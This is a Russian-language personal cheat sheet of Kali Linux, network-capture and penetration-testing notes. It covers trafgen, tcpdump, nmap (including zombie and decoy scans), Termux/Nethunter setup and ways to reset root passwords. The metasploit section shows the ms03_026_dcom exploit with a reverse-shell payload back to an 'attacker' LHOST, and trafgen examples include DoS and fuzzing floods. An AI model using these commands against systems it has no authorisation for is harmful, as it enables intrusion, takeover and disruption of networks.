Ссылки:
|
1 2 3 4 5 6 7 8 |
https://aliexpress.ru/wholesale?SearchText=badusb https://github.com/topics/badusb https://github.com/robertio/DM-3212-Badusb/blob/master/README.md https://github.com/wangwei39120157028/BadUSB https://github.com/asciiterminal/CJMCU_ATMEGA32U4_BADUSB https://github.com/TheMMcOfficial/CJMCU-3212-wifi_ducky https://github.com/joelsernamoreno/badusb_sd_wifi https://www.youtube.com/watch?v=G-Z2rf_AN-c&ab_channel=%D0%9D%D0%BE%D0%9A%D0%BE%D0%BC%D0%BF |
Ссылки:
|
1 2 3 4 |
http://netsniff-ng.org/ https://github.com/jonschipp/gencfg https://github.com/netsniff-ng/netsniff-ng https://man7.org/linux/man-pages/man8/trafgen.8.html |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
0. Ставим пакеты apt install netsniff-ng git 1. Скачиваем в удобное место генератор конфигов для gentraf git clone https://github.com/jonschipp/gencfg.git 2. Собираем конфиг для gentraf /gencfg.sh -G rfc2544 -s 192.168.88.61 -d 192.168.88.1 -m 52:54:00:27:f8:a0 -M b6:1d:99:22:dd:07 G rfc2544 - желаемый тест -s 192.168.88.61 - source, источник трафика окуда будем запускать генератор -d 192.168.88.1 - dist, куда трафик должен прилететь -m 52:54:00:27:f8:a0 - мак источника -M b6:1d:99:22:dd:07 - мак назначения 3. Запуск генерации трафика trafgen --dev enp1s0 --conf rfc2544-1672235689/1024.cfg --dev enp1s0 - интерфейс --conf rfc2544-1672235689/1024.cfg - конфиг размер пакета 1024 (Внимание там в каталоге есть еще конфиги) 4. Далее мы можем наблюдать с помощью любого снифера как наш трафик летит tcpdump netsniff-ng Используй следующие: ifpps |
trafgen примеры:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
trafgen --dev eth0 --conf trafgen.cfg Это самое простое и, наверное, самое распространенное использование трафген. Он будет генерировать трафик, определенный в файл конфигурации ''trafgen.cfg'' и передать его через сетевое устройство eth0. Используются все процессоры онлайн. trafgen --dev eth0 --conf trafgen.cfg --cpus 2-4 Вместо того, чтобы использовать все онлайн-процессоры, передавайте трафик из ЦП 2, 3 и 4. trafgen -e | trafgen -i - -o lo --cpp -n 1 Это пример, когда мы отправляем один пакет встроенного например через петлевое устройство. Пример конфигурация передается через стандартный ввод, а также через C процессор до того, как его увидит компилятор пакетов trafgen. trafgen --dev eth0 --conf fuzzing.cfg --smoke-test 10.0.0.1 Прочтите файл конфигурации пакета ''fuzzing.cfg'' (который содержит вызовы drnd()) и отправляет сгенерированные пакеты к устройству eth0. После каждого отправленного пакета проверка связи атакуемый хост с адресом 10.0.0.1, чтобы проверить, еще жив. Это также означает, что мы используем только 1 ЦП, и не используйте TX_RING, а отправляйте(2) пакетный ввод-вывод из-за в «медленный режим». trafgen --dev wlan0 --rfraw --conf beacon-test.txf -V --cpus 2 В качестве устройства вывода используется ''wlan0'' и помещается в режим мониторинга, поэтому мы собираемся передавать сырой 802.11 кадры по воздуху. Используйте ''beacon-test.txf'' файл конфигурации, установите trafgen в подробный режим и используйте только 2 CPU, начиная с CPU 0. trafgen --dev em1 --conf frag_dos.cfg --rand --gap 1000us Используйте trafgen в режиме sendto(2) вместо режима TX_RING и спать после каждого отправленного пакета статический временной интервал на 1000 мкс. Сгенерируйте пакеты из ''frag_dos.cfg'' и выберите следующий пакеты для отправки случайным образом, а не циклическим способом. Выходным устройством для пакетов является ''em1''. trafgen --dev eth0 --conf icmp.cfg --rand --num 1400000 -k1000 Отправьте только 1400000 пакетов, используя ''icmp.cfg'' файл конфигурации, а затем выйдите из trafgen. Выбрать пакеты случайным образом из этого файла для передачи и отправить их через eth0. Кроме того, запускайте ядро каждые 1000 мкс для группирование кольцевых кадров из пользовательского пространства (по умолчанию 10us). trafgen --dev eth0 --conf tcp_syn.cfg -u `id -u bob` -g `id -g bob` Отправка пакетов, сгенерированных из файла конфигурации tcp_syn.cfg через сетевое устройство eth0. После настроить кольцо для передачи, сбросить учетные данные на пользователь без полномочий root/группа bob/bob. trafgen --dev eth0 '{ fill(0xff, 6), 0x00, 0x02, 0xb3, rnd(3), c16(0x0800), fill(0xca, 64) }' -n 1 Отправьте 1 недействительный пакет IPv4, созданный из командной строки, на все хосты. |
Ссылки:
|
1 2 3 4 5 6 7 8 9 10 11 |
https://opencanary.readthedocs.io/en/latest/starting/configuration.html https://jasonmurray.org/posts/2021/opencanary/ https://github.com/thinkst/opencanary https://github.com/pwnlandia/mhn https://github.com/technicaldada/pentbox https://en.iguru.gr/dimiourgia-honeypot-sto-kali-linux-pentbox/ https://itsecforu.ru/2018/03/19/%D0%BD%D0%B0%D1%81%D1%82%D1%80%D0%BE%D0%B9%D0%BA%D0%B0-honeypot-%D0%B2-kali-linux-pentbox/ https://github.com/thinkst/opencanary/wiki https://habr.com/ru/company/alexhost/blog/528796/ https://kali.tools/all/? |
Вроде как актуально:
|
1 2 3 4 |
opencanary https://opencanary.readthedocs.io/en/latest/starting/configuration.html https://jasonmurray.org/posts/2021/opencanary/ |
Ссылки :
|
1 2 3 4 5 |
В последнем обновлении популярный среди безопасников и хакеров дистрибутив Kali Linux получил любопытный режим «Undercover» — «под прикрытием», суть которого сводится к визуальной мимикрии под графическую оболочку Windows. http://compizomania.blogspot.com/2019/12/kali-undercover-mode-xfce-linux.html https://habr.com/ru/company/dcmiran/blog/478314/ |
Установка:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
0. Xfce + Whiske sudo apt-get update - прежде всего обновим список пакетов sudo apt-get install xfce4 -y - затем установим основные компоненты рабочего стола xfce sudo apt-get install xfce4-goodies -y - теперь добавим дополнительные компоненты командой sudo apt-get install task-xfce-desktop - решение проблемы с ярлыками sudo apt-get install xfce4-whiskermenu-plugin 1. Качаем и ставим undercover wget http://archive.kali.org/kali/pool/main/k/kali-undercover/kali-undercover_2019.4.1_all.deb sudo dpkg -i kali-undercover_2019.4.1_all.deb git clone https://gitlab.com/kalilinux/packages/kali-undercover cd ~/kali-undercover sudo cp -r share /usr/ sudo cp bin/kali-undercover /usr/bin/ 2. По умолчанию в скрипте на установку задействована только светлая тема оформления приложений, но желающие могут добавить тёмную тему того же автора, выполнив следующие команды в терминале: cd /tmp; wget https://github.com/B00merang-Project/Windows-10-Dark/archive/master.zip unzip master.zip sudo mv Windows-10-Dark-master /usr/share/themes 3. Если вы передумаете и решите полностью удалить Kali Undercover Mode, перейдите на оформление XFCE и выполните в терминале следующие команды на удаление: sudo rm /usr/bin/kali-undercover sudo rm /usr/share/applications/kali-undercover.desktop sudo rm -r /usr/share/icons/Windows-10-Icons sudo rm -r /usr/share/themes/Windows-10 sudo rm -r /usr/share/kali-undercover |
ссылки
|
1 2 |
https://github.com/rajkumardusad/Tool-X https://amitego.ru/community-2/main-category/tool-x-eto-odnim-slovom-ustanovshhik-hakerskih-programm/ |
установка
|
1 2 3 4 5 6 |
sudo apt update - обновляем установленные пакеты sudo apt install git - устанавливаем git git clone https://github.com/rajkumardusad/Tool-X.git - ставим из git Tool-X cd Tool-X - переходим в каталог с Tool-X chmod +x install.aex - даем права на выполнение sh install.aex если не работает выполняем так ./install.aex |
Как использовать?
|
1 2 3 4 5 6 7 8 9 10 11 12 |
(0) : установить все программы (1): показать все доступные инструменты и ввести номер инструмента, который вы хотите установить. (2): Показать категорию инструментов. (3): для установки операционной системы в Termux (4): если вы хотите обновить Tool-X. (5): Если вы хотите знать о нас. (х): для выхода из инструмента. Программы устанавливаются сюда: cd /root - для linux cd /data/data/com.termux/files/home - для android termux |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
DOS заголовок четыре байта 4D 5a значение Mz текст ..program cannot be run Dos mode. так же адрес начало pe заголовка. 50 45 значение Pe PE заголовок 5045 значение Pe Здесь мы можем увидеть список секций. обычно не больше 10. У каждой секции есть атрибуты чтения, записи и исполнения. Имена секций не фиксированы называться могут как угодно. .text - секция кода где содержится код программы. Чаще всего стоит запрет на запись. Разрешено выполнение и чтение. .data - секция данных. данные для работы программы. Чаще всего стоит запрет на выполнение. Запись и чтение разрешено. .rdata - таблица импорта. перечислены нужные библиотеки для работы программы. .rsrc - ресурсы программы. Картинки, иконки, звуки и мелодии. petools программа для ковыряния исполнительных файлов. entry point адресс входа в программу |
Пользователь:
|
1 |
Пользователь никогда не должен иметь доступ к источнику информации. |
Вирусы:
|
1 2 3 4 5 |
Блокировщики Диструкторы Шифраторы Шпионы Ботнет-DDOS |
Запуск:
|
1 2 3 4 |
1. autorun.inf 2. авто установщики / авто архивы 3. скрипты\зараженные страницы. 4. java \ flash \ ПО \ ОС \ дыры |
Защита:
|
1 2 3 4 5 |
1. Сканирование 2. Запуск в песочнице 3. Отслеживание действий 4. Проверка записи 5. Полная проверка (drweb cureit) AVZ |
Запись неверной инфы в программу / данные:
|
1 2 3 4 5 6 7 8 9 10 |
вероятные события 1. остановка 2. не верный результат 90% - чтение данных 10% - записи данных Два сервера первый запись и чтение. а второй резервный только запись в сучили аварии основного сервера начинаем использовать резервный. |
пароли — подбор:
|
1 2 3 4 5 6 7 |
1. 62 варианта 2. 62 в квадрате 3844 3. Не Болтай..... шоколадки рулят... 4. простые пароли 5. вскрываемые социальные пароли 6. одиночные слова и короткие фразы 7. пустой пароль |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
.NET = dotNET .NET Framework Виртуальная .NET машина - Common Language Runtime (CLR) C Sharp = C# сишарп J Sharp = J# джишарп Visual Basic .NET визуал бейсик дотнет Common Intermediate Launguage CIL - IL - промежуточный язык http://en.wikipedia.org/wiki/List_of_CIL_instructions - инструкции Инструменты net.reflector + addons reflexil.netreflector ilspy Крэкми Можем редактировать только il язык |
Ссылки:
|
1 2 3 4 |
https://wiki.termux.com/wiki/%D0%AD%D0%BA%D1%80%D0%B0%D0%BD%D0%BD%D0%B0%D1%8F_%D0%BA%D0%BB%D0%B0%D0%B2%D0%B8%D0%B0%D1%82%D1%83%D1%80%D0%B0 https://wiki.termux.com/wiki/Kali_Nethunter https://f-droid.org/packages/com.termux/ https://wiki.termux.com/wiki/Main_Page |
Старая доп панель:
vi ~/.termux/termux.properties
|
1 |
extra-keys = [['ESC','/','-','HOME','UP','END','PGUP'],['TAB','CTRL','ALT','LEFT','DOWN','RIGHT','PGDN']] |
Kali Nethunter
|
1 2 3 4 5 6 7 8 9 10 11 |
Установка nethunter: pkg install wget wget https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter chmod +x kalinethunter bash kalinethunter Решение проблем после установки: apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6 wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb apt --fix-broken install dpkg -i ./kali-archive-keyring_2018.1_all.deb |
metasploit
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
pkg update pkg install unstable-repo pkg install metasploit msfconsole db_status git init ---------- ---------- use auxiliary/scanner/portscan/tcp set PORTS 1-5000 set RHOSTS 192.168.88.161 run search dcom use exploit/windows/dcerpc/ms03_026_dcom set payload windows/shell_reverse_tcp show options set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность) set LHOST 192.168.88.247 - IP злоумышленника run cd ..\..\ echo Hello! > achtung.x msg helo можно вводить любую команду, как в обычном cmd.exe |
Любимые приложения:
|
1 |
pkg install openssh python golang vim |
|
1 2 3 4 5 |
/usr/share/images/desktop-base/desktop-grub.png - символьная ссылка /usr/share/images/desktop-base/kali-grub.png - само изображение тут mv /usr/share/images/desktop-base/kali-grub.png /usr/share/images/desktop-base/kali-grub.png.bak - переносим \ делаем bakup файла cp wallpaper-1.png /usr/share/images/desktop-base/kali-grub.png - копируем нашу новую заставку для grub update-grub - просим grub перечитать конфиг файлы |
|
1 2 |
wget 'https://archive.kali.org/archive-key.asc' apt-key add archive-key.asc |
Cinnamon
|
1 2 3 4 5 |
sudo apt-get install kali-defaults kali-root-login desktop-base cinnamon - установка sudo update-alternatives --config x-session-manager - выбор окружения sudo apt install lightdm - установка lightdm ( поможет если cinnamon не запустился ) |
Установка Xfce в Kali Linux:
|
1 2 |
sudo apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies - установка sudo apt-get remove xfce4 xfce4-places-plugin xfce4-goodies - для удаления |
Установка KDE в Kali Linux:
|
1 2 3 4 5 |
sudo apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop - установка sudo apt-get install kali-defaults kali-root-login desktop-base kde-standard - установка стандартная sudo apt-get install kali-defaults kali-root-login desktop-base kde-full - установка полный набор пакетов sudo apt-get remove kde-plasma-desktop kde-plasma-netbook kde-standard - удаление |
Установка LXDE в Kali Linux:
|
1 2 3 |
sudo apt-get install lxde-core lxde kali-defaults kali-root-login desktop-base - установка sudo apt-get remove lxde-core lxde - удаление |
Установка GNOME в Kali Linux:
|
1 2 3 |
sudo apt-get install gnome-core kali-defaults kali-root-login desktop-base - установка sudo apt-get remove gnome-core - удаление |
Установка MATE в Kali Linux:
|
1 2 3 4 5 6 7 |
sudo apt-get install kali-defaults kali-root-login desktop-base mate-core - установка sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment - установка mate-core и дополнения sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment-extra - установка и еще больше обновлений sudo apt-get remove mate-core - удаление |
Установка e17 в Kali Linux:
|
1 2 3 |
sudo apt-get install e17 - установка sudo apt-get remove e17 - удаление |
Изменить окружение из установленных:
|
1 2 3 4 |
Используйте следующую команду чтобы выбрать главное окружение рабочего стола. Эта команда выведет список доступных вариантов. sudo update-alternatives --config x-session-manager |
Включить/отключить графический режим с помощью systemctl
|
1 2 3 4 5 6 7 8 9 10 11 |
Узнать какой режим сейчас установлен можно командой: systemctl get-default graphical.target - запускается графическая оболочка при старте multi-user.target - графика не стартует Отключить запуск X-ов при старте системы: systemctl set-default multi-user.target Вернуть обратно запуск графической оболочки: systemctl set-default graphical.target |
|
1 2 3 4 5 |
!!! Будь осторожен можно сломать дистрибутив sudo apt-get autoremove -y - удаление не нужных файлов после установки ПО sudo apt-get autoclean -y - удалить скачанные файлы архивов sudo apt-get clean -y - удалить старые скачанные файлы архивов sudo apt-get install -f -y - решение проблем с установкой по |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
iwconfig wlan0 iwconfig wlan0 essid name key password iwconfig wlan0 essid name key s:password ip link set wlp2s0 up - включить устройство wlp2s0 !!! Если у вас возникнет ошибка: !!! RTNETLINK answers: Operation not possible due to RF-kill !!! Можно установить утилиту rfkill и с ее помощью решить эту проблему. lspci | grep -i wireless - поиск беспроводных pci-карт ip link list - выводе этой команды будет содержать все сетевые интерфейсы iw dev - показать устройства wi-fi iwconfig wlan0 essid "MyNet" - присвоить SSID "MyNet" iwconfig wlan0 channel 3 - установит канал 3 iwconfig wlan0 mode Ad-Hoc - сменить режим Managed на Ad-Hoc iwconfig wlan0 ap any - использовать любую точку доступа iwconfig wlan0 sens -50 - установить чувствительность -50 iwconfig wlan0 retry 20 - установить значение 20 для повторной передачи MAC ifconfig wlan0 key 1234-pass-123 - установить пароль 1234-pass-123 iwconfig wlp4s0 mode ad-hoc - настройка режима работы ad-hoc iwconfig wlp4s0 essid ваш_essid - подключение к незащищенной сети iwconfig wlp4s0 essid ваш_essid freq 2432M - подключение с задающим каналом сети iwconfig wlp4s0 essid ваш_essid key s:ваш_ключ -подключение к WEP зашифрованному каналу сети, ключа ASCII iwconfig wlp4s0 power on - включение режима экономии питания iw dev wlp4s0 link iwconfig wlp4s0 - показать статус соединения iw dev wlp4s0 scan iwlist wlp4s0 scan -сканирование сети на точки доступа iw dev wlp4s0 set type ibss - настройка режима работы ad-hoc iw dev wlp4s0 connect ваш_essid - подключение к незащищенной сети iw dev wlp4s0 connect ваш_essid 2432 - подключение с задающим каналом сети iw dev wlp4s0 connect ваш_essid key 0:ваш_ключ - -подключение к WEP зашифрованному каналу сети, ключа ASCII iw dev wlp4s0 set power_save on - включение режима экономии питания iw dev wlp4s0 scan | less - сканируем сеть |
Проверка файла sources.list:
|
1 |
if cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main contrib non-free" || cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main non-free contrib"; then echo -e "\n\nРепозитории в порядке"; else echo -e "\n\nПроблемы с репозиториями"; fi |
Одно из решений, перепишем sources.list:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
0. Делаем резервную копию cp /etc/apt/sources.list /etc/apt/sources.list.`date +%Y-%m-%d`.back 1. Переписываем source.list echo -e "deb https://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list 2. Обновим систему а) так sudo apt update sudo apt upgrade -y sudo apt full-upgrade -y б) или так sudo apt update && sudo apt full-upgrade -y |
Установка
|
1 2 |
yum install tcpdump - установка в centos apt install tcpdump - установка в debian |
Опции утилиты tcpdump:
|
1 2 3 4 5 6 7 8 9 10 |
-i интерфейс # Задает интерфейс, с которого необходимо анализировать трафик (без указания интерфейса - анализ "первого попавшегося") -n # Отключает преобразование IP в доменные имена. Если указано -nn, то запрещается преобразование номеров портов в название протокола. -e # Включает вывод данных канального уровня (например, MAC-адреса). -v # Вывод дополнительной информации (TTL, опции IP). -s размер # Указание размера захватываемых пакетов. (по умолчанию - пакеты больше 68 байт) -w имя_файла # Задать имя файла, в который сохранять собранную информацию. -r имя_файла # Чтение дампа из заданного файла. -p # Захватывать только трафик, предназначенный данному узлу. (по умолчанию - захват всех пакетов, например в том числе широковещательных). -q # Переводит tcpdump в "бесшумный режим", пакет анализируется на транспортном уровне (протоколы TCP, UDP, ICMP), а не на сетевом (протокол IP). -t # Отключает вывод меток времени. |
Наиболее часто используемые фильтрующие параметры команды tcpdump:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
dst хост # Проверяет, совпадает ли адрес получателя IP-пакета с указанным значением. # Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста. src хост # Проверяет, совпадает ли адрес отправителя IP пакета с указанным значением. # Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста. host хост # Проверяет, совпадает ли адрес отправителя или получателя с заданным значением. # Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста. net имя_сети # Проверяется, находится ли адрес отправителя/получателя в заданной сети. # Возможно указание сети в формате CIDR (например 10.0.0.1/22), либо указание имени сети, # заданной в файле /etc/networks. ip | arp | rarp | tcp | udp | icmp [хост] # Проверяет, принадлежит ли пакет одному из указанных протоколов и при указании адреса хоста проверяет, # совпадает ли адрес отправителя\получателя с заданным. # Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста. [tcp | udp] dst port номер_порта # Проверяется, принадлежит ли пакет протоколу TCP/UDP и равен ли порт назначения заданному. # Можно указать номер порта, либо имя, заданное в файле /etc/services. [tcp | udp] src port номер_порта # Проверяется, принадлежит ли пакет протоколу TCP/UDP и равен ли порт источника заданному. # Можно указать номер порта, либо имя, заданное в файле /etc/services. [tcp | udp] port номер_порта # Проверяется, принадлежит ли пакет протоколу TCP/UDP и равен ли порт назначения или источника заданному. # Можно указать номер порта, либо имя, заданное в файле /etc/services. ether { src | dst | host } MAC_адрес # Проверяется, принадлежит ли сетевой пакет источнику, назначению, # источнику или назначению имеющему заданный MAC_адрес. ip broadcast # Проверяется, является ли IP пакет широковещательным. ether broadcast # Проверяется, является ли ARP-пакет широковещательным. |
Примеры использования tcpdump:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
tcpdump -i eth0 # слушаем интерфейс eth0 tcpdump port 80 # слушаем 80 порт tcpdump host google.com # слушаем трафик с хоста google.com tcpdump -n -i eth0 icmp # Ловим пакеты icmp (ping pong) tcpdump | grep -v ssh # поиск пакетов исключая пакеты ssh tcpdump -n -i eth0 net 192.168.1.15 # трафик с/на IP tcpdump -n -i eth0 net 192.168.1.0/24 # трафик с/в сеть tcpdump -l > dump && tail -f dump # Вывод с записью в файл tcpdump -i eth0 -w traffic.eth0 # Информация о трафике записывается в бинарный файл traffic.eth0 tcpdump -i eth0 -s 0 -w traffic.eth0 # Запись + загрузка в бинарный файл tcpdump -r traffic.eth0 # Читаем из файла tcpdump -i eth0 -X port \(110 or 143\) # Проверка pop и imap на безопасность tcpdump -i eth0 -s 0 -A port 80 | grep GET # (-s 0 весь пакет, -A для ASCII) tcpdump -npi iface_name ether src MAC-address # узнать MAC устройства iface_name -имя интерфейса MAC-address -мак адрес устройства tcpdump -vvv -s 0 -l -n port 53 # показываем DNS трафик tcpdump -nl -i bge0 not port ssh and src \(192.168.16.121 or 192.168.16.54\) tcpdump -n -i eth1 net 192.168.16.121 # Выборка входящий/исходящий по одному IP адресу tcpdump -n -i eth1 net 192.168.16.0/24 # Выборка входящий/исходящий по адресу сети tcpdump -l > dump && tail -f dump # Вывод через буфер tcpdump -i rl0 -w traffic.rl0 # Писать заголовки в бинарный файл tcpdump -i rl0 -s 0 -w traffic.rl0 # Писать в бинарный фйл полные пакеты tcpdump -r traffic.rl0 # Прочитать из файла (так-же для ethereal tcpdump -i eth0 -s 0 -A port 80 | grep GET # -s 0 для полных пакетов, -A для ASCII |
Пример частого применения
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
tcpdump -n -i eth0 -s0 not port 22 and not port 8080 and not port 161 and not arp -n Не преобразовывать dns имена -i eth0 Указывает интерфейс, на котором будет захват трафика (замените eth0 на нужный интерфейс). -s 0 Устанавливает размер снэпшота. По умолчанию tcpdump захватывает только первые 96 байт каждого пакета, параметр -s 0 указывает захватывать полный пакет. not port 22 не собирать инфу по 22 порту and служит для добавления еще фильтра not port 8080 не собирать инфу по 8080 порту and служит для добавления еще фильтра not port 161 не собирать инфу по 161 порту and служит для добавления еще фильтра not arp не собирать инфу по arp |
Еще из одних частых способов применения
|
1 2 3 4 5 6 7 8 9 10 11 |
Возможные параметры: -n: Не преобразовывать IP-адреса и порты в имена. -vvv: Включает максимально подробный вывод. -X: Показывает содержимое пакетов в шестнадцатеричном и ASCII форматах. -i fm1-mac3: Указывает сетевой интерфейс fm1-mac3 для захвата пакетов. port 4000: Фильтрует пакеты по порту 4000. src 192.168.55.60: Фильтрует пакеты по IP-адресу источника 192.168.55.60. dst 192.168.55.60: Фильтрует пакеты по IP-адресу назначения 192.168.55.60. Пример: tcpdump -n -vvv -X port 4000 and dst 192.168.55.60 |
Wireshark to file
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
tcpdump: Утилита для захвата сетевых пакетов. -vvv: Увеличивает уровень детализации выводимой информации. -v дает более подробную информацию, -vv еще больше, и -vvv максимально подробный вывод. -n: Не разрешать IP-адреса и порты в имена. Это делает вывод более быстрым и менее загроможденным. -X: Показывает содержимое пакетов как в шестнадцатеричном, так и в ASCII форматах. Полезно для детального анализа содержимого пакетов. -i fm1-mac3: Указывает интерфейс fm1-mac3 для захвата пакетов. Убедитесь, что это имя вашего сетевого интерфейса. port 4000: Фильтрует пакеты по порту 4000. Только пакеты, относящиеся к этому порту, будут захвачены. and dst 192.168.55.60: Дополнительный фильтр, который захватывает только те пакеты, у которых IP-адрес назначения 192.168.55.60. -w -: Указывает tcpdump записывать вывод в стандартный поток вывода (stdout) вместо файла. Это позволяет передавать данные через канал (pipe) к другой команде. ssh: Утилита для безопасного подключения к удаленным системам через сеть. wrstemp@192.168.16.168: Указывает пользователя (wrstemp) и IP-адрес удаленного компьютера (192.168.16.168), к которому будет выполнено подключение. 'cat > /home/wrstemp/capture.pcap': Команда, которая будет выполнена на удаленном компьютере. Она принимает ввод (в данном случае поток данных от tcpdump) и записывает его в файл /home/wrstemp/capture.pcap. tcpdump -i fm1-mac3 port 4000 and src 192.168.55.60 and dst 192.168.55.60 -w - | ssh wrstemp@192.168.16.168 'cat > /home/wrstemp/capture.pcap' tcpdump -vvv -n -X -i fm1-mac3 port 4000 and dst 192.168.55.60 -w - | ssh -v wrstemp@192.168.16.168 'cat > /home/wrstemp/capture.pcap' |
nmap
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
nmap -v -A 192.168.0.101 - !!! стандартный скан одного хоста nmap -sn 192.168.1.1-254 - !!! сканировать сеть с ip 192.168.15.1 по 192.168.15.254 (выявит живые хосты, используется arp,icmp) nmap -sT -p 22,3389,80 192.168.1.1 - !!! проверить порт 22,3389 у хоста 192.168.1.1 nmap -sI host_zombie host_need_scan -p80-81 - !!! сканировать host_need_scan порты 80-81 через host_zombie nmap -O target.host.com - !!! информация о системе nmap -vv host.target.com - !!! стандартный скан подробный вывод nmap --traceroute ya.ru -p 80 - !!! выполнить traceroute ya.ru используя 80 порт nmap -sV 192.168.11.101 -p 3389 - !!! узнать информацию о хосте 192.168.11.101 по открытому порту 3389 nmap -sV ххх.ххх.ххх.ххх -p 1-65535 - опция -sV - служит для получения версий запущенных сервисов nmap -sX -p 22 192.168.10.10-250 -oN /data/host.txt - Сканирование машин с ip от 10 по 250 и запись результата nmap -A -T4 192.168.100.123 - самый распространенный метод сканирования nmap -v -sP 192.168.0.101/24 - выяснить какой IP каким хостом используется в сети 0/24 nmap -sP 192.168.16.0/24 - выяснить какой IP каким хостом используется в сети 0/24 nmap -sP 192.168.1.0/24 - Узнать занятые IP в сети 1.0/24 (IP, MAC, hostname) nmap -sS -sV -O cb.vu - провести stealth SYN сканирование с определением типа и версии OS nmap -sS -sV -O tager.ru - Скрытое SYN сканирование с определением типа и версии ОС nmap -sS -O -p 21, 25, 80 www.site.com - сканируем www.site.com проверяем только 21, 25, 80 порты, используем определение удалённой ОС (метод OS fingerprints) и стелс сканирование nmap -sT -F -P0 -oN scan.txt www.site.com - сканируем www.site.com применяем обычное сканирование стандартных портов (1-1024), с отменой ping-опросов и заносим результат в файл scan.txt nmap -sU -D 8.8.8.8 8.8.4.4 localhost www.site.com - сканируем www.site.com проводим сканирование UDP-портов, при этом маскируемся двумя хостами (третий наш). nmap 10.0.0.1 - сканировать порты пк с IP 10.0.0.1 nmap -vv 10.0.0.1 - сканировать порты пк с IP 10.0.0.1 (подробный вывод) nmap -vv -sP 10.0.0.0/24 - сканирует сеть 10.0.0.0/24 nmap -vv -P0 -O -p 100-200 10.0.0.1 - сканирует хост 10.0.0.1 (без пинга, вывод инф. об ОС, порты с 100-200) |
Некоторые другие полезные инструменты:
|
1 2 3 |
hping (http://www.hping.org) - сборщик/анализатор IP пакетов fping (fping.sourceforge.net) - сборщик/анализатор IP пакетов round-robin - проверка хостов |
Пример:
|
1 2 |
nmap -sn 10.3.1.3-254 | grep "Nmap scan report" | cut -c `echo -e "Nmap scan report for" | wc -c`-50 > list-address-test.txt for i in `cat list-address-test.txt` ; do echo -e "Подключаюсь к ${i}" && curl https://${i} --connect-timeout 2 ; done |
Основой способ для любых unux:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
!!! получится если системный раздел не зашифрован 0. Загружаемся с livecd Например: debian live cd, ubuntu live, systemrescue и т.д. https://www.system-rescue.org/ 1. После загрузки определяемся с дисками fdisk -l lsblk 2. Монтируем раздел системы mount /dev/sda1 /mnt 3. Выполняем смену корня chroot /mnt 4. Выполняем смену пароля passwd user 5. Выходим chroot и загружаемся в систему Ctrl+d reboot |
Linux, способ раз
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
В загрузчике (lilo или grub), введите следующие опции: init=/bin/sh Ядро смонтирует корневую файловую систему, init запустит системный шелл(bash) . Используйте команду passwd, что-бы изменить пароль root и пере загрузитесь. Если после загрузки, корневой раздел файловой системы смонтировался в режиме read only (только чтение), перемонтируйте его в rw, для чтения/записи: # mount -o remount,rw / # passwd # или удалите пароль root (/etc/shadow) # sync; mount -o remount,ro / # синхронизация перед монтированием в read only # reboot FreeBSD, способ 1 На экране загрузчика выберите Single user(опция 4), перемонтируйте корневую fs в rw, используя утилиту passwd установите новый пароль для root. # mount -u /; mount -a # перемонтирует корневую fs в режим rw # passwd # reboot |
Unix и FreeBSD и Linux, способ 2
|
1 2 3 4 5 6 7 8 9 |
Некоторые Unix системы, могут не дать вам исполнить вышеописанные трюки. Решение проблемы в том, что-бы смонтировать корневую fs из другой OS (типа загрузочного CD) и сменить пароль. Загрузитесь с LiveCD или установочного диска в режиме восстановления. Найдите корневой партишн с помощью fdisk, например fdisk /dev/sda Смонтируйте его и используйте chroot: # mount -o rw /dev/ad4s3a /mnt # chroot /mnt # сделать /mnt корневой fs # passwd # reboot |
Reset password debian 1
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
